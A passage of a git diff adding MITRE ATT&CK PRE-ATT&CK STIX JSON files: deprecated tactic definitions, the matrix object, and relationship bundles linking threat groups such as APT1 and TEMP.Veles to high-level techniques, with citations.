Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership.", + "external_references": [ + { + "external_id": "TA0013", + "url": "https://attack.mitre.org/tactics/TA0013", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-direction", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:32:47.554Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Planning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0012/).\n\nPriority definition planning consists of the process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. An analyst may outline the priority definition when in the course of determining gaps in existing KITs or KIQs.", + "external_references": [ + { + "external_id": "TA0012", + "url": "https://attack.mitre.org/tactics/TA0012", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-planning", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:31:37.810Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Stage Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0026/).\n\nStaging capabilities consists of preparing operational environment required to conduct the operation. This includes activities such as deploying software, uploading data, enabling command and control infrastructure.", + "external_references": [ + { + "external_id": "TA0026", + "url": "https://attack.mitre.org/tactics/TA0026", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "stage-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:57.122Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Target Selection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0014/).\n\nTarget selection consists of an iterative process in which an adversary determines a target by first beginning at the strategic level and then narrowing down operationally and tactically until a specific target is chosen.\u00a0 A target may be defined as an entity or object that performs a function considered for possible engagement or other action.", + "external_references": [ + { + "external_id": "TA0014", + "url": "https://attack.mitre.org/tactics/TA0014", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "target-selection", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:33:25.361Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Technical Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0015/).\n\nTechnical information gathering consists of the process of identifying critical technical elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Technical intelligence gathering includes, but is not limited to, understanding the target's network architecture, IP space, network services, email format, and security procedures.", + "external_references": [ + { + "external_id": "TA0015", + "url": "https://attack.mitre.org/tactics/TA0015", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "technical-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:33:53.838Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Technical Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0018/).\n\nTechnical weakness identification consists of identifying and analyzing weaknesses and vulnerabilities collected during the intelligence gathering phases to determine best approach based on technical complexity and adversary priorities (e.g., expediency, stealthiness).", + "external_references": [ + { + "external_id": "TA0018", + "url": "https://attack.mitre.org/tactics/TA0018", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "technical-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:24.309Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0025/).\n\nTesting capabilities takes place when adversaries may need to test capabilities externally to refine development goals and criteria and to ensure success during an operation. Certain testing may be done after a capability is staged.", + "external_references": [ + { + "external_id": "TA0025", + "url": "https://attack.mitre.org/tactics/TA0025", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "test-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:29.580Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "id": "x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PRE-ATT&CK", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/matrices/pre/).\n\nBelow are the tactics and techniques representing the MITRE PRE-ATT&CK Matrix.", + "external_references": [ + { + "external_id": "pre-attack", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/matrices/pre" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "tactic_refs": [ + "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd", + "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6", + "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b", + "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec", + "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8", + "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c", + "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607" + ], + "modified": "2020-10-22T15:43:48.844Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + }, + { + "type": "marking-definition", + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-06-01T00:00:00Z", + "definition_type": "statement", + "definition": { + "statement": "Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + } + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0adf353d-688b-46ce-88bb-62a008675fe0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0adf353d-688b-46ce-88bb-62a008675fe0.json new file mode 100644 index 0000000000000000000000000000000000000000..2cf709c74da122c6efb594bb2c0ea7d2b1ad65b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0adf353d-688b-46ce-88bb-62a008675fe0.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--5d38c19d-0603-4ba5-822a-64ef7fc8afb2", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--0adf353d-688b-46ce-88bb-62a008675fe0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used servers in China, the U.S., and the Netherlands in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "type": "relationship", + "modified": "2019-03-25T14:36:29.818Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae.json new file mode 100644 index 0000000000000000000000000000000000000000..5c78d04b97661ad03eece80052da24fbd21d768c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--075ef5d6-c757-4d6b-92bb-63f7a76360c7", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb.json new file mode 100644 index 0000000000000000000000000000000000000000..37c18e00ca639494b2e549bdbd301fc8da9d697f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e1fa03eb-21e8-4265-aac4-a25979e837c0", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used dynamic DNS to register hundreds of FQDNs.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "type": "relationship", + "modified": "2019-08-20T13:08:13.554Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce.json new file mode 100644 index 0000000000000000000000000000000000000000..64e463950664dd27ad8444e549d5aa7cd83c23ce --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8d3dda57-1da5-43ca-8334-a5bd975103f0", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--1143e6a6-deef-4dbd-8c91-7bf537d8f5ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1aafdefb-304e-4998-87cc-81aad295f721.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1aafdefb-304e-4998-87cc-81aad295f721.json new file mode 100644 index 0000000000000000000000000000000000000000..ee4cc5f0d7f4a00f9a527346179db4dda3b4f031 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--1aafdefb-304e-4998-87cc-81aad295f721.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cde4b1c6-6776-41e8-88ea-4ff9e74f5b47", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "target_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "relationship_type": "related-to", + "id": "relationship--1aafdefb-304e-4998-87cc-81aad295f721", + "type": "relationship", + "modified": "2019-02-19T18:56:56.136Z", + "created": "2019-02-19T18:56:56.136Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2.json new file mode 100644 index 0000000000000000000000000000000000000000..cf0d936b39cd61a59e63ef71cb850c1db5dbcc7e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--85bfb7bf-b003-4a3d-9f6d-ff2e04c4e559", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used dynamic DNS.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2", + "type": "relationship", + "modified": "2019-04-29T18:59:16.596Z", + "created": "2019-04-24T19:45:44.212Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133.json new file mode 100644 index 0000000000000000000000000000000000000000..2633043b270d2da821d250b2d26a5e55bdd7fb64 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--34e0f2c5-6a22-49fb-a4ab-83bface05671", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd.json new file mode 100644 index 0000000000000000000000000000000000000000..c1a305d42c2e2f2d9410a7021985b0b8218a52b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--670e7d9c-af30-4fdd-9c22-98392fa7729a", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53.json new file mode 100644 index 0000000000000000000000000000000000000000..33a0a102d51c86d506a2ade7c227c07f7d06bd7c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c55833f2-0a0a-4c64-9790-936881d1503b", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5.json new file mode 100644 index 0000000000000000000000000000000000000000..7b426bb3e6fa6c1c351d9e7decfd036057a27d2c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--9357670e-8a37-4ed4-b9ee-4a4ab8361216", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used publicly available privilege escalation tools.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-08-20T13:08:13.337Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84.json new file mode 100644 index 0000000000000000000000000000000000000000..a6bbb588c14fa2c5f9bffc5a3f9519da3037a7ca --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6d4febcb-2cd8-47a7-93ff-8a09b0c1b427", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2d95ed6f-52e7-4708-af15-9a6c08390454.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2d95ed6f-52e7-4708-af15-9a6c08390454.json new file mode 100644 index 0000000000000000000000000000000000000000..9abe512893601ae670b5cadded6b5abba0c8a1de --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2d95ed6f-52e7-4708-af15-9a6c08390454.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--849bdc92-52a6-4ab4-90f4-f4f6d88c83c4", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--2d95ed6f-52e7-4708-af15-9a6c08390454", + "type": "relationship", + "modified": "2019-04-29T18:59:16.595Z", + "created": "2019-04-24T19:45:44.205Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259.json new file mode 100644 index 0000000000000000000000000000000000000000..89da25ae4aee9a583b178016ebb62ffe76b0cabf --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4bc1d334-e9ea-4a1e-b117-0563b68d3ec1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d.json new file mode 100644 index 0000000000000000000000000000000000000000..5fd99c261c090dddd373b942a6ce95bccf4cc5bf --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--284a38a8-13a3-4684-a929-fb0923722314", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--39db1df8-f786-480c-9faf-5b870de2250b.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--39db1df8-f786-480c-9faf-5b870de2250b.json new file mode 100644 index 0000000000000000000000000000000000000000..1f2c99b830fd86a61b8b16c879a515ae7416a43c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--39db1df8-f786-480c-9faf-5b870de2250b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--6c5240ff-139d-4c4f-a2fc-1b9de150ebc9", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--39db1df8-f786-480c-9faf-5b870de2250b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used third party email services in the registration of whois records.(Citation: Mandiant APT1)", + 